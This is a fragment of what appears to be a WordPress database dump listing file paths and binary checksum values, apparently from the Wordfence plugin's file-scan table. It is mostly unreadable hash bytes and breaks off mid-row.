���Em[�����l�<','wp-includes/js/tinymce/plugins/image/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��ZC�l­}�莐�','y��T��Nz+����⃆��\'��%Y�','',0,'?'),('�h��\r����\Zc�n&','wp-includes/wp-includes/Requests/SSL.php',0,'��K��������','��K��������','�}I^L�\\95�N�Y���;�?z��aE=�','',0,'?'),('�m���$V4/���','wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.js',0,'����6�l�UOaD�Q�','����6�l�UOaD�Q�','����jT�q�T��I:KZ��a\n�6�U7e��-','',0,'?'),('�OT��ɛ�w���:�F','wp-includes/wp-includes/js/media-editor.js',0,'��@4Va�ˣ������','��@4Va�ˣ������','���9�R����\r��Ʋo[�N�K��š*h��','',0,'?'),('�y��^��)�k�l','wp-includes/wp-includes/widgets/class-wp-widget-links.php',0,'�x�/k�h\n��ֽ[Nv	','�x�/k�h\n��ֽ[Nv	','�쇉���,�x���-��DO�,��7ш�Q�','',0,'?'),('���S�\\}�����d1','wp-content/themes/shootingstar/docs/assets/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�l��#�W��dƋ','��:4�p�m��UH��!��6�o��','',0,'?'),('��W��Q��i�b#��\\','wp-includes/wp-includes/js/mediaelement/wp-mediaelement.css',0,'�%/NqOR�g��+\\�','�%/NqOR�g��+\\�','F}\Z\n��v�n�`��Z�!�T��W����s','',0,'?'),('��{�]\\ֵ�	��d��','wp-admin/css/forms-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ՒMwG��2�x͝','ݗ��|\0�[����1��1n|�m�©�O� ','',0,'?'),('����Ljt�r�(�̰�','wp-content/themes/sg-window/genericons/genericons/Genericons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&tw�4�Љ�pc�$','���;��=LV|,8�Tg0W�N�QA@kC@���','',0,'?'),('�������\"�R�Ŝ','wp-includes/images/crystal/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� Ѳ��#�d�%�[�','n1��0��<;�\n��Ip��~�f���⠸��z','',0,'?'),('�#bP���a���14�lZ','wp-includes/wp-includes/class-wp-http-proxy.php',0,'@U,�:��-<I�e��','@U,�:��-<I�e��','U���缕�H�.c�Sd~�*��)�','',0,'?'),('�h�$��T��G���P�','wp-content/themes/sg-window/content-page-archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xF��~�|���','_�\ro�K�{���\0H��V.|��!w�.��','',0,'?'),('�v%���S�[�̪�Ѿ','wp-includes/ms-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\n����[�|�J/�','�8f�٣�“��<}.Q��������','',0,'?'),('��~C�>��xh��\r','wp-content/plugins/wp-cerber/assets/flags/bh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tx\n=CS\Z�f��PF|','(���=AEhe�SJ駄�_�Ve2Z�E��&j�','',0,'?'),('������W�Q��ʠ\Z�','wp-includes/wp-includes/js/dist/compose.js',0,'R6�\\J��\"5r���','R6�\\J��\"5r���','h��l�2������<��_9��x����C�ҏ','',0,'?'),('���|X%jgu@�CJ�M','wp-includes/js/dist/vendor/react.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d:�K��D��,$',';���\Z��w7��:���[�ܧ/�8��_�@]','',0,'?'),('����O��Z)��','wp-includes/wp-includes/SimplePie/Cache.php',0,'	��~ܯ{ʹ���+h�','	��~ܯ{ʹ���+h�','�md�����n�nun�pU0 l��6���Zi�R','',0,'?'),('��\'0��iz���<','wp-content/themes/shootingstar/docs/assets/blueprint-css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4Iw�2��d�\Z�GXE�','4u�����պ����=֎+��e��%����X��','',0,'?'),('��i���<���?�?m�','wp-includes/wp-includes/css/buttons-rtl.min.css',0,'F��X�WDw����ڭ�','F��X�WDw����ڭ�','�o� ������!Pc�����\0�i�F9aK����','',0,'?'),('�ւxRa��ǜ�@','wp-includes/css/dist/editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_O7b/��T���m�','_w��^���p�{�,ǣ��{}�:�\0���2�','',0,'?'),('���X\"�-{��$48sx','wp-admin/css/deprecated-media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k+�H�h����3','�ؖ)_��6h����1��A\\�_lgK�d�kUX�q','',0,'?'),('��42���i�[�O��','wp-content/plugins/wp-cerber/assets/flags/tf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�``�O��.�˛�','��������r��4�&,lb�Fr~�T<���阈�','',0,'?'),('��Ud��M���S$�l','wp-admin/includes/class-wp-list-table-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�>\r_D\"��Ck��C','\\�;��]\"���(+/��}�˚q5��NS\'�','',0,'?'),('�\0���O��b5o�','wp-content/plugins/wp-cerber/assets/flags/ir.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dV�M�t^,��7�xD','i��֚b5�J��?]����+��H�r8��','',0,'?'),('�\rz��@�_Ð�m�dM','wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�96�f����;���0','mgc%�i\Zn�A��B�@��wF�z�;�y`\rN','',0,'?'),('�8�FM-<8~����<�','wp-includes/wp-includes/images/arrow-pointer-blue-2x.png',0,'%m�rތ]4�9c�','%m�rތ]4�9c�','��{&DO�z��A�f�/��gá������A]~�(�','',0,'?'),('�@G��t�eY�\\\'>�O','wp-content/plugins/wordfence/lib/wfVersionCheckController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�]Tg���\Z�!��','�m1�X^��s$�	Eh��M���WR�{��^�','',0,'?'),('�Z��Wt�p�N�h','wp-admin/css/nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��\'�]9?�]g�$','���P�a���̬Vch�;������;l','',0,'?'),('����Ȯr��&x�q�','wp-content/plugins/wp-cerber/assets/flags/fi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ќ0C��e���#��','�r\r=O�֓bt����:ٚU$R?�}�t��','',0,'?'),('��Z ��Og\nW�W�2','wp-includes/js/wp-embed-template.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x)�tM�`WXx>�5�\\�','�b.�Ļ�@ߑϐ�E��c\Z1��ŀX�Z\n�8/�','',0,'?'),('��!�h>�iq�8t��n','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��>��@Ue��U','�țp���˄o<��O\n��Oo{�w=�S','',0,'?'),('���\\��9�ѕ�F�w�','wp-admin/js/revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L��Oez���nUR','�q��:\\��H�-��ƒ�V��i���ԍ�$','',0,'?'),('�����B��\r���b\r','wp-content/themes/shootingstar/css/woocommerce-custom.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ѳ��Cdn���c/','W��#:�fl+�j�kj[��@��+����t-','',0,'?'),('��#��eM�(DZ߽��','wp-content/themes/sg-window/img/icons/friendfeed.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nv�]���g8��}�	','̳J&j����q��Se?��l7�\\\\�','',0,'?'),('��Y#�� IŖue���','wp-includes/wp-includes/SimplePie/Category.php',0,'{���[�� �ZVG�4&','{���[�� �ZVG�4&','�<��J�H�v�i�	b�4l~�e�F��mj�','',0,'?'),('�����Ly��RB�9�k','wp-content/plugins/wp-cerber/assets/flags/mh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�\0oէ��3ˠ','�ܰ�\n\0�\'6G�R���ZH-�`��Ș��	','',0,'?'),('�%���_���Hs��\n','wp-includes/wp-includes/images/icon-pointer-flag.png',0,'��,���E^�j`\'','��,���E^�j`\'','oq��9��a{)h}=#�����T�ק��','',0,'?'),('�(Oد���~�m}��%','wp-includes/wp-includes/css/wp-pointer.css',0,'HB���v��}�d~�','HB���v��}�d~�','�72�4����.���ҷCŧ�Z���;7Fr�b','',0,'?'),('�(�~���t���','wp-content/themes/shootingstar/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��������+�','�/�t�F�5��;��G�)�\0z��I�m��:','',0,'?'),('�/=�+HhE��14�ʆ�','wp-content/plugins/wordfence/views/tours/login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[QTGfS\"�����','�4���4HGM�;]B���FO��d�ƴ6@�','',0,'?'),('�GR�������m)','wp-content/plugins/wp-cerber/assets/flags/kg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8]�/E0%�gQյQ�','�3$��f�Rx)��@\\�e.3\Z�Ω�\r`p�Y','',0,'?'),('�u��и�;����]!6)','wp-includes/wp-includes/js/dist/is-shallow-equal.min.js',0,'`�Y��5n��Y�2-�','`�Y��5n��Y�2-�','��Q�f�1��)ۡV�G�y�8�V�d���%','',0,'?'),('�u������%�(��','wp-content/plugins/wordfence/modules/login-security/css/ionicons.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�ƣٿc;���z���','��N�J�s�@�3	�:h)�7K�<�\\N�+','',0,'?'),('����N���@�(�3�','wp-includes/ID3/module.audio.mp3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O:B঍\0�z�6x`B','�	]����	\0On��6B;���\ZZ$�	2ЯSh','',0,'?'),('��h���)UG@�x��v	','wp-admin/edit-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�8���K��PH�>H','��j\r�+Yg��1��S����t2�f��;�','',0,'?'),('��/�����N.&R�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',0,'�N���>�EH�I��� �','�N���>�EH�I��� �','u).H����� �����C���HsԐ`$�','',0,'?'),('��X��w��E��','wp-includes/blocks/more/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�ݜ����_ť;k)M','�6��6Pa����D���@���f6�{��','',0,'?'),('��or�������籽�','wp-content/plugins/wp-cerber/assets/flags/bq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��2]hqu:�T6E�U�','wp-content/plugins/wordfence/lib/wfAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[DW\01f�!�`ߜ�','����Ld+,\rO�V���UNxea9̽�+O�C1�','',0,'?'),('�\r[�8�)�r�}8e','wp-content/plugins/wp-cerber/assets/flags/sz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']{W���:��(�Բ�','PJU����I\"�,�����uVo��ƞ�dQ*z','',0,'?'),('�	Ie�ԩ[G���_�6','wp-includes/js/dist/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������Ƒ�~d','�$O`��1��\\��\Z�p���۳�wR��L}�e?','',0,'?'),('�#�AuI.F��/���','wp-includes/js/wp-pointer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8\Z߁@ \r�|�ɛ[d','��O�Ȇm~����gƷ^96��}>|̭/�]��','',0,'?'),('�,.��<��@�G��','wp-includes/wp-includes/js/jquery/ui/effect-size.min.js',0,'�t(������D','�t(������D','�[�9E�3%��4�F�9��:�uØ�~j9�','',0,'?'),('�@��,�n\\���+k�','wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\'�Q8b�/����a�','�3t\\R>��_a��>�\0��|ՑVC�䦇OB','',0,'?'),('�C��ݑ��=w%8P�','wp-includes/wp-includes/js/dist/reusable-blocks.js',0,'^�ގ�g��Ts؉f�','^�ގ�g��Ts؉f�','zt\r��j�Z\Z��H�ͼċ�!f����;��','',0,'?'),('�O/�ì�`|g�_\0','wp-includes/Requests/Exception/HTTP/429.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��%|F.àZd����','��!�T��uwm�t5�o\n�2A\"k�ߚz�','',0,'?'),('�Z��S=�\0����v�H','wp-content/plugins/wp-cerber/assets/flags/er.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�Ք#ӕ��?.O�]��','��\0�D?J1�nd�&�%��6\"ᅃ�.��� ','',0,'?'),('�v��O蒗v�����','wp-content/themes/sg-window/img/icons/tumblr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�Y��v$ |�r�E','6��\0(�N)g�\"���5���)ՀL�ߗ','',0,'?'),('�v�FI��2h���n�','wp-content/plugins/wordfence/readme.txt',0,'��R���ݯ6��','��R���ݯ6��','z�O҈|�AL?�n�X>��lKt:%��6','',0,'?'),('�{�1�\"��^���.','wp-includes/class-wp-widget-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ե�ᡵ���|��I� ','(H��e3a�Z]��t\\�����\'�d��p���','',0,'?'),('���s��������v ','wp-includes/blocks/social-links/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<{�Vg3B+z�B��','�I�W�}��Ogzˀ	��h��-��wl','',0,'?'),('��s��I�qF�����','wp-admin/includes/class-theme-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\P\0������E�é��','T���V/@cB����Վ�o��0`��f_���','',0,'?'),('���=V;�����N.K','wp-includes/js/wp-list-revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PbOP�xO�rs7��2','�#��;w�1���.��B���3�f_;�Pf�','',0,'?'),('�����h��١k�','wp-content/plugins/wp-cerber/assets/fb2b.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}d��ΰ��R͵�','Ky�Y	�O~�vx�W�� �<3����PZPZ','',0,'?'),('����7OPs�Ωp��W','wp-content/plugins/wp-cerber/assets/multi/multi.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P?�� a��80�$','*}�AB�/�*o%���;���5��k��;�3','',0,'?'),('��\n�ӛIQED	��','wp-includes/class-wp-comment-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���!T0^ę��:�','�Q����M�����b?S��_c%��C1`A\0','',0,'?'),('����\\�M�M�F/�I','wp-includes/Requests/Auth/Basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��x̄�	4U�	k!C','.�йh�dBiHɀ�n�s����᝗�\\���O','',0,'?'),('��΢�s�3r���F�','wp-includes/wp-includes/js/tinymce/skins/lightgray/skin.min.css',0,'���\\��B���&�pw�','���\\��B���&�pw�','7>xV&v|­��U�& ݷ\"ǥz9j�F%ѽK��V','',0,'?'),('��Κ,�Q�a�gl��\Z�','wp-includes/class-smtp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.斚a�q�ݓϠ����','B)HJ����ڐ�R�ps� ����	+\'8k_','',0,'?'),('��s��,��j�j3','wp-content/plugins/wp-cerber/assets/flags/gg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��L\Z��|�=�c��','wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B0�����ou��̌�','����7/Q���ƐՐw�g:�?��#{s��ɟ�','',0,'?'),('��`j���D��.�I','wp-content/themes/sg-window/img/icons/small/blogger.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڌ\0�U��aY�h4N̖�','9���}+�@\r�ȹz�cP-�R��z!�A@�X�','',0,'?'),('��dA#���*�Źo7','wp-admin/js/customize-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�$�����a�F','{��f[�����;�\"�h�]]u��3	�_�oQ�\Zu','',0,'?'),('�3=^��7�P�RA','wp-content/plugins/wp-cerber/assets/flags/sr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NT��I`$�x�\"v','�J!�^�α}���ݓ$�R�M~i���c���P','',0,'?'),('��V\ZF��\0���|�','wp-includes/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@Bg�EJ�ƽH�','i��|\\I����E����_��X綈j��','',0,'?'),('���x�OW\r�����','wp-includes/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ئT�Ь�Ԅc�/��','TJ�)�,8�q�@�f�<Dڛ��\rx����F�','',0,'?'),('�5ڜ���2�l2{�','wp-admin/js/widgets/media-video-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�ܥ��d|Q�S�n�','��R;T��wh��m^�����䜺��K�L�A','',0,'?'),('�8�Ö��z��ϣ�0��','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519.php',0,'�0���s0C{[��[t7','�0���s0C{[��[t7','Z�z`�}���J�GN]����l��Q��8��H','',0,'?'),('�D��!VD+����','wp-content/plugins/wordfence/views/scanner/scan-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�V���	�9�J�','փ��hbf��#��Ђ��OE��R���9H\r','',0,'?'),('�M�/<�P�ߍ�f.��','wp-includes/js/jquery/ui/effect-bounce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;B� ��GYQ�n�ߴ','���m/�g|ڶ\\���e(�>6��\n�-G!�\0','',0,'?'),('�VT��2e�w�gߋu8','wp-includes/js/jquery/ui/button.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��.��ȴ�fh~O','Û�.�k(5S�1��!����>�^I t�ȭ���.','',0,'?'),('�i�+Hv#��وR�q','wp-includes/wp-includes/class-wp-recovery-mode.php',0,' �oxц��<N��',' �oxц��<N��','�4>���\r�	j����s�dqm��H��l�7�~��','',0,'?'),('�z�6��+���PH\r�tU','wp-includes/css/dist/block-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p>F��ő~���K��','fm��e)����$�4�_%��8�R��L��','',0,'?'),('���˥̰MVЗe�A�','wp-admin/js/widgets/media-video-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3S��-!@|��[�M','���s�n�����U������Bo3�}��+�+','',0,'?'),('���t��(�iltY/','wp-includes/css/dist/list-reusable-blocks/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����(����6�','��b1O�������:�DDHR�cj�ѐ�P�\r','',0,'?'),('��Τe;y�[��9�9','wp-includes/js/jquery/ui/checkboxradio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"VSdF\n��k���:','$Lq���\'��i�>WuY\\���{�k���\r�{','',0,'?'),('��\nL0Qod`�\\�;�','wp-content/plugins/wp-cerber/assets/icons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T4�s�bRߺ0�','v	�QNԯ�L�|̗E��,@���8By�:Y��','',0,'?'),('���B��u��d�Y','wp-includes/wp-includes/class-wp-feed-cache.php',0,'\Z��ط?h\"��%c��(\0','\Z��ط?h\"��%c��(\0','lh�>��6�<Z,2��1*!�cm;z~��܏�4��','',0,'?'),('��3\"�(z�a�4�8�','wp-includes/images/media/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-o��Uʓ��U�U_','\'eM a[R#q2��kz�+*<�����7\0��j','',0,'?'),('�����ܚh8��#�J�','wp-includes/wp-includes/customize/class-wp-customize-date-time-control.php',0,'(��ch�L��F�3�b','(��ch�L��F�3�b','�!V���#|��:�{Ǎ.a����(�[y�O%','',0,'?'),('���Q��s����ܰ\0','wp-includes/wp-includes/random_compat/random_bytes_com_dotnet.php',0,'nM@<��A6�@!�Y��','nM@<��A6�@!�Y��','.#�$.N�.��\\\"�Cuj�%H��EJֈ^a','',0,'?'),('�~Q�ԁŴFp���','wp-includes/class-wp-taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kx�om���u�5t�','��8TI�|�|C�!��`vg�#�Q!ɓ{=��','',0,'?'),('�-Ob�G�?Ou�uhl','wp-includes/wp-includes/class-wp-block-styles-registry.php',0,'Kc�����\0z�[>�\rY','Kc�����\0z�[>�\rY','��J�x\r]�|��-��u+ߏ�$�a��','',0,'?'),('�2|�MJ�/�͆�^�}','wp-content/plugins/wp-cerber/assets/flags/ao.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\'��cu��fq�','�9&��[��؊�|�&���ʘ�����<��HR','',0,'?'),('�E��9/4�1�D	�','wp-content/themes/shootingstar/docs/assets/blueprint-css/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��D��;sA}','�d���tO����l[k��	_��J�E���','',0,'?'),('�kHm�1��`0ѹ��_','wp-content/plugins/wordfence/lib/wordfenceConstants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2����sg�5�䃥l','�?*��\0Z:WX̩�k�k\0IM��UT','',0,'?'),('�z���O�M�&�K�|�','wp-includes/wp-includes/sodium_compat/namespaced/Core/SipHash.php',0,'r-�e��r^�!�~','r-�e��r^�!�~','��`��R�lԥLz�?i�āACH�󞮣Py�n','',0,'?'),('�zݿ�&X❙6���s','wp-admin/css/media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E^?���7��v�+�z=','A�l:d�72[�X1R�w�#��ؤ�p��h5�6X','',0,'?'),('��!��y��F��]���','wp-admin/includes/class-wp-ajax-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&L�g=�%cn�	}ǣ�','(��`���ĺ�E�ϙ)#��I�jHߠ�&�{','',0,'?'),('����\n ����(z','wp-includes/PHPMailer/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������ߡ�M(���','��A+�n7�51�K���i��|Y��m','',0,'?'),('��p��������2M','wp-includes/wp-includes/js/wp-lists.min.js',0,'��uP��*�L�[�C�','��uP��*�L�[�C�','!��JL=�Tl̞_p@��ȟ���R��M��S[','',0,'?'),('�ٵ\nh��Jx�dv�ԃ]','wp-content/plugins/wordfence/lib/wf503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�ݥ��!��YG�w','!�r�|�n�M�-��Yn6X�p����ʖ','',0,'?'),('���ب�R	�C%>)��','wp-includes/wp-includes/js/jquery/ui/effect-highlight.min.js',0,'N���x���:��cT�','N���x���:��cT�','D�I�4h\ng�SZ����o|�(ޱs\r8�z��','',0,'?'),('�����m*�$�','wp-includes/wp-includes/js/jquery/suggest.js',0,':$tV�E�ʿ���',':$tV�E�ʿ���','r�,K�pŗrq^b�\\��=rZ�]��6�+','',0,'?'),('��$�T�X�@#��A��','wp-admin/js/widgets/text-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�#)��i�M��}����','\n��^uӟf~LE5A�\0��r23�q6BSk���','',0,'?'),('���2zs�4x�EB','wp-includes/ID3/module.tag.id3v1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IU��.Q�c�g���','�C��BH�9��D�y�;-�K�:LAx�?8\\~�	��','',0,'?'),('�_r#�Eȯ�̪%','wp-content/plugins/wp-cerber/assets/flags/ne.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�`R��$�`}L��\0\"�','h�~w=+^��Q#Wt/��	w�~�j���+','',0,'?'),('�Obc��\" ���|J(','wp-includes/images/smilies/icon_evil.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��M�>�z��','���Q|x>���@VЛ_�/�\"��W���%S','',0,'?'),('�*��K��M9��¬t{','wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.js',0,'��k+%�5l3�!-��','��k+%�5l3�!-��','�2`���Ri�L��#e؄�4�6�g�p�o~�','',0,'?'),('�+�К��ԃ\r�I�','wp-content/themes/sg-window/inc/css/slider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ewk�QW��ܛ��','b�/���7��!�G���k\"���f`«\\','',0,'?'),('�-�šw�Voyvϭ$N','wp-includes/wp-includes/js/jquery/ui/effect-blind.min.js',0,'�ȷ��� ��m�7','�ȷ��� ��m�7','Q�X�_m�\\>��h�!Ƶ�^M���!V^&','',0,'?'),('�1��WV(2��6����','wp-admin/images/icons32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۬[�m9��J�4�\Z�','D�kC�d��i|a|�����+�\r�x��̌��','',0,'?'),('�6��M͓��)̻','wp-includes/blocks/text-columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�ȴ����Y͆ ','�A��-�תe���`�)�\'WS>KXIZ��','',0,'?'),('�=���}�LsQ\n`q&','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[M/*��E�<s�W�RG','\n�\\��Xΰ֨P��A�—\nXj�\'�;q�{��a�','',0,'?'),('�O�tg�\02�\\�B��','wp-includes/assets/script-loader-packages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KEȱ)��W�;�+�X�','���u��0�.Ƚ�ސ�-ƈǴ���]=$��','',0,'?'),('�O��c��ئ>�ha*v','wp-includes/wp-includes/Requests/Exception/HTTP/413.php',0,'�<�]ɐY��XL��','�<�]ɐY��XL��','\r��}�䟹-V�����\'eCCʅ�e-2,0','',0,'?'),('�U,�w���Q-{[�','wp-includes/wp-includes/js/colorpicker.js',0,'��V g�����-�','��V g�����-�','�V�w��%�%�:�3CQ#+g��	��e�}�','',0,'?'),('�Ym�R�l�X\0���:','wp-content/plugins/wordfence/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�II�ٹ�$V��;�','p�K�-�׈�.,�ZT�!��:-[�������','',0,'?'),('�]숊YT��Xm�+%','wp-includes/js/dist/vendor/moment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d\"��\"M��aM�w�M','O��m��y���6ۆ�x`R0Nh[7\0]�%�ʞ','',0,'?'),('�j��U�U�X\Z��/J/','wp-admin/includes/class-core-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�����	X�9\"QB','Hg�-�9������O�2G����f�#�B���S','',0,'?'),('�sXb��&A/��	�P','wp-content/themes/sg-window/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0$y�Ԅ�;��@��6�','�-�\\=��\\@Y��ʉ��l���x�%��];','',0,'?'),('„2�`ZeU�T���','wp-includes/wp-includes/js/plupload/plupload.min.js',0,'���6�JJ�7�+�','���6�JJ�7�+�','�+\"��Q���/N:�T$��\"���ȯ\r8v_3','',0,'?'),('Š�gزh/Ḯ�O�N','wp-includes/class-wp-block-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<Aj�Q�~$���~��','��\\)�dw(?o���1�i�n�@�~KU6���Z','',0,'?'),('���Ň�a��A�','wp-includes/wp-includes/js/backbone.min.js',0,'��`ft7\\J�*��4a','��`ft7\\J�*��4a','j�˯�}j�$��@�č��� n%Q|�l��','',0,'?'),('¯61�:a��E�\0AM','wp-includes/wp-includes/js/jquery/ui/menu.js',0,'��V7g����q�ʤ','��V7g����q�ʤ','O&����x�1�,m��Q�c��YE�#RG���','',0,'?'),('�1���|�}���dQ','wp-admin/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�\"�\r\r�','x��=��|ˋ{�lbn��;��Ep���r�?','',0,'?'),('�t���~܌=�kƦ�','wp-includes/wp-includes/css/dist/nux/style.css',0,',�L��g�a�J\\',',�L��g�a�J\\','��)��v5i�B�:#��%����N�����','',0,'?'),('��z�Z�9ɟQ�56�','wp-includes/wp-includes/js/customize-preview.min.js',0,'�tQ��M�ʈ�����','�tQ��M�ʈ�����','��=��y�0��RAB�b����)�?=�n�','',0,'?'),('��)Gr:�8�q��','wp-includes/wp-includes/class-wp-comment-query.php',0,'d���!T0^ę��:�','d���!T0^ę��:�','�Q����M�����b?S��_c%��C1`A\0','',0,'?'),('����\\@��x�h��','wp-includes/wp-includes/SimplePie/Parser.php',0,'�+��dGzC\0��u\r��','�+��dGzC\0��u\r��','a���,�\"���Ɣ_*{�Z��m���ɛ���','',0,'?'),('�	1��А々�S:(','wp-includes/js/thickbox/loadingAnimation.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"h\r�c���&�','B�F���`�F-��l�ڛ�RT6���Յ��','',0,'?'),('��-� 